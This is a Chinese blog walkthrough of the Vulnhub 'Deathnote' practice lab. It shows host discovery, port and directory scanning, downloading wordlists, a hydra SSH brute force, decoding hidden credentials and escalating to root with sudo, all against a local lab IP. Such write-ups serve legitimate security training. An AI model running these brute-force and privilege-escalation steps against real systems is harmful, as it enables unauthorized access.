Deathnote 靶场详细教学

最新推荐文章于 2024-06-04 17:04:07 发布
最新推荐文章于 2024-06-04 17:04:07 发布
阅读量890 收藏 1
点赞数 1
分类专栏: 网络安全 Vulnhub百个项目渗透 文章标签: 安全 web安全 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60374959/article/details/128093386
版权

 

目录

简介

信息收集

0x01 主机发现

0x02 端口扫描

0x03 目录爆破

0x04 访问rebots文件

0x05 爆破域名

 0x06 爆破

0x07 内网信息收集

提权

0x08 信息收集

总结

简介

这个靶场属于常规靶场,没有太多弯弯绕绕,前期最基本的信息收集,找到用户名密码爆破,然后继续信息收集,然后使用sodu提权。这个靶场最大的效益就是给我们道理一些工具的使用。

攻击机kali:192.168.1.57

靶机:192.168.1.73

信息收集

0x01 主机发现

arp-scan -l

 

0x02 端口扫描

nmap -sV -T5 -p- -A 192.168.1.73

 

0x03 目录爆破

dirb http://192.168.1.73

 

0x04 访问rebots文件

fuck it my dad 
added hint on /important.jpg

ryuk please delete it
发现其实这个东西并没什么用

这个时候我们需要去把域名和IP放在hosts文件中,做一个域名解析

cat /etc/hosts                            #linux中添加
C:\Windows\System32\drivers\etc           #windows下的路径

添加
192.168.1.73 deathnote.vuln

 访问解析后的域名

http://deathnote.vuln/

 

0x05 爆破域名

dirb http://deathnote.vuln/wordpress/

dirb http://deathnote.vuln/wordpress/wp-content/

 发现一些有用的信息,

http://deathnote.vuln/robots.txt

http://deathnote.vuln/wordpress/wp-login.php

http://deathnote.vuln/wordpress/wp-login.php?redirect_to=http%3A%2F%2Fdeathnote.vuln%2Fwordpress%2Fwp-admin%2F&reauth=1

http://deathnote.vuln/wordpress/wp-login.php?registration=disabled

 使用webscan扫描网站指纹

webscan 192.168.1.73

 还在robot文件中发现一个图片,但是下载下来解析发现并没什么用,到这里我们其实漏掉一个关键性的目录

 访问目录

 

 这里我们发现两个txt文件,一个user,和一个note。我们下载下来,然后尝试使用hydra爆破,看看能不能爆破(其实这里就有两个思路,就是我们使用两个字典可以去爆破ssh,也可以去爆破网站的账号密码,爆破网站作者在这就帮你们尝试了一下,发现并不能)

wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt
wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt

 

 0x06 爆破

hydra -L user.txt -P notes.txt 192.168.1.73 ssh
账号:l      密码:death4me

 我们使用ssh连接成功

 

0x07 内网信息收集

尝试sudo提权

 发现不能sudo提权,继续信息收集

ls -al     
发现一个文件
cat user.txt
加密文件
解密:
i think u got the shell , but you wont be able to kill me -kira


解密工具:https://ctf.bugku.com/tool/brainfuck

 继续信息收集,在/opt/L/fake-notebook-rule下发现两个文件,一个是使用方法,一个是一组16进制文件,我们开始解密

源码:
63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d


解密之后:
cGFzc3dkIDoga2lyYWlzZXZpbCA=

base64解码:
kiraisevil

解密工具:
https://www.sojson.com/hexadecimal.html     #16进制转文本

 发现一个密码,我们去/home文件夹下面看一下有没有其他用户,发现一个kira账号

 尝试ssh连接

登入成功

提权

0x08 信息收集

查看kira.txt

 发现并没有什么

尝试sudo提权

sudo -l      #查看是否可以sudo提权

 发现所有用户都可以提权,提权成功

sudo su

 

总结

涉及知识点:

1.信息收集

2.工具的使用:hydra,webscan

3.密文解密(常见的base64,md5都可以通过kali自带的工具解决)

4.sudo提权

收获:这个靶场主要还是考验我们信息收集能力,我们可以发现,并没有涉及漏洞利用的环节,单纯的去找用户名密码的信息,然后去使用ssh连接欸,寻找信息的过程中,也考验我们对工具的利用。

心"元"意“码”
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DeathNote.github.io
05-30
死亡笔记.github.io
DEATHNOTE
10-24
DEATHNOTE
DeathNote-crx插件
04-06
语言:Deutsch Ein Neue死亡笔记Regeln fur jeden neue标签 Ein Neue死亡笔记Regeln fur jeden neue标签
deathnote-web
05-12
死亡笔记网 安装 npm i 跑步 npm start 结构 src/Services包含与API请求/响应相关的组件,挂钩和函数。 src/Components包含与UI相关的可重用的React组件。 src/router包含页面(路由)。
deathnote1靶场详解
weixin_44681307的博客
07-21 104
因为找的时候在home目录下发现一个l的用户名,这里数据库用户名也是l,就先尝试ssh登陆了一下,没想到直接登陆了上来。我们在插件的地方发现一个可以上传文件的地方,在这里上传了一个php的反弹shell,虽然显示上传失败,但是上传成功了。结果发现给了两个提示,第一个是让我们去找/opt目录下的L,第二个是让我们去找/var目录下的Misa。我们来到l用户的.ssh目录下找到l的私钥文件,然后ssh登陆一下kira用户,发现成功登陆上来了。找到ip后对ip进行一个单独的扫描,查看都开启了什么服务。
靶机14 DEATHNOTE: 1
honest_gg的博客
10-09 1006
不要浪费太多时间跳出框框思考。这是一个直截了当的盒子
【Vulnhub靶场Deathnote: 1
DG_s1mple
03-13 2472
环境准备 下载靶机后导入到vmware 题目并没有给出ip地址,需要我们自己探测 信息收集 kali使用arp-scan命令可以得到靶机的IP地址 靶机IP地址为:192.168.2.17 攻击机IP地址为:192.168.2.16 接下来我们使用nmap扫描一下靶机开放的端口 发现靶机只开放了ssh跟http服务 开始渗透 我们先访问它的网站,发现它跳转到了一个域名 我们修改hosts文件 这样就可以正常访问了 发现是一个wordpress站点,我们查找一下有用的信息 发现一个可能是密码的字符
DeathNote 靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
11-03 868
DeathNote 死亡笔记靶场渗透记录 正义终将战胜邪恶,致2022-11-2 LZ 3岁男童事件,人的恶行终会被记录到DeathNote中......
vulnhub-Deathnote靶场
lionwerson的博客
11-28 3586
Deathnote下载https://download.vulnhub.com/deathnote/Deathnote.ova1.打开靶机,nmap扫描一下端口: 只有22和80端口,打开浏览器,然后修改host文件: IP deathnote.vuln 这个靶场是死亡笔记的主题,头像是死亡笔记男主神无月,死亡笔记的持有者之一,外界称为基拉,也就是kira,上面写的是我会干掉你 L,L是剧中的侦探,为了抓捕男主基拉。 hint表示线索,让我们寻找notes.txt或者L的评论。 ...
Deathnote靶机】
qq_40646572的博客
05-19 668
信息收集 开启deathnote靶机。 通过nmap扫描,发现靶机开启了80端口以及22端口。 地址栏输入ip地址,页面跳转。因此需要配置dns。 配置下/etc/hosts文件。 使用whatweb工具识别下web服务中使用的技术,发现使用的是wordpress框架。 发现http://deathnote.vuln/ 网站下存在关键文件robots.txt。 上面提示到提示信息在important.jpg文件中。 图片无法正确加载出来,那就先下载下来。 发现直接使用cat方法可以直
Deathnote靶机实验实战演练
lianliandad的博客
10-31 844
Vulnhub靶机:Deathnote
qq_48904485的博客
01-12 871
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:Deathnote(10.0.2.16)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/deathnote-1,739/
Vulnhub靶机_Deathnote
学术渣渣的博客
09-12 1897
文章目录靶机介绍渗透过程获取靶机IP端口扫描dirb扫描网站目录信息1信息2信息3登录wordpresshydra 爆破密码提权 靶机介绍 下载地址: http://www.vulnhub.com/entry/deathnote-1,739/ 难度:简单 介绍: don’t waste too much time thinking outside the box . It is a Straight forward box . 渗透过程 获取靶机IP arp-scan -l 得到靶机的IP为:192.1
vulnhub靶场Deathnote
qq_58091216的博客
02-21 1061
现在我们知道用户名,不知道密码,我们前面扫描到robots.txt,有一个提示说在important.jpg添加了提示,那么我们就在网站图片上面找。发现了文件的路径获得密码字典,那么肯定是有用的,我们想到22端口是开放的,我们可以试试爆破ssh。首先,我们进入fake-notebook-rule,发现了2个文件,一个是加密的数字,一个是提示。我们查看根目录下的内容,发现了user.txt文件,我们进行查看。我们可以看到登录成功,我们进行查看,看有没有可以利用的地方。
deathnote1靶机超详细新手笔记
m0_65938147的博客
04-11 723
Kali linux_百度百科 (baidu.com)](https://baike.baidu.com/item/Kali linux/8305689)
Web综合靶场-LazysysAdmin
weixin_46601374的博客
05-20 1335
果然花学校的钱我一点都不心疼。 nmap -sV --allports bad97dda.lxctf.net 御剑和dirsearch 扫一些目录 py dirsearch.py -u http://cd1928d1.lxctf.net/ 有robots.txt,去看看 disallow,我才不信,我偏要去看看 Index of /old (lxctf.net)http://cd1928d1.lxctf.net/old/ 貌似啥都没有,但...
“安全生产月”专题报道:AI智能监控技术如何助力安全生产
最新发布
TSINGSEE青犀视频官方技术博客
06-04 821
方案能够通过对人员行为的识别和分析,判断是否存在安全隐患。这些功能的实现,有助于企业提高安全管理水平,减少因人为因素导致的安全事故。
更新/ql/data/repo/leafTheFish_DeathNote失败,请检查网络...
05-28
出现更新/ql/data/repo/leafTheFish_DeathNote失败,请检查网络的情况,可能是因为以下原因之一: 1. 网络连接问题:请检查您的网络连接是否正常,确保您的设备已连接到互联网。 2. 防火墙或代理问题:请检查您的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

心"元"意“码”

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值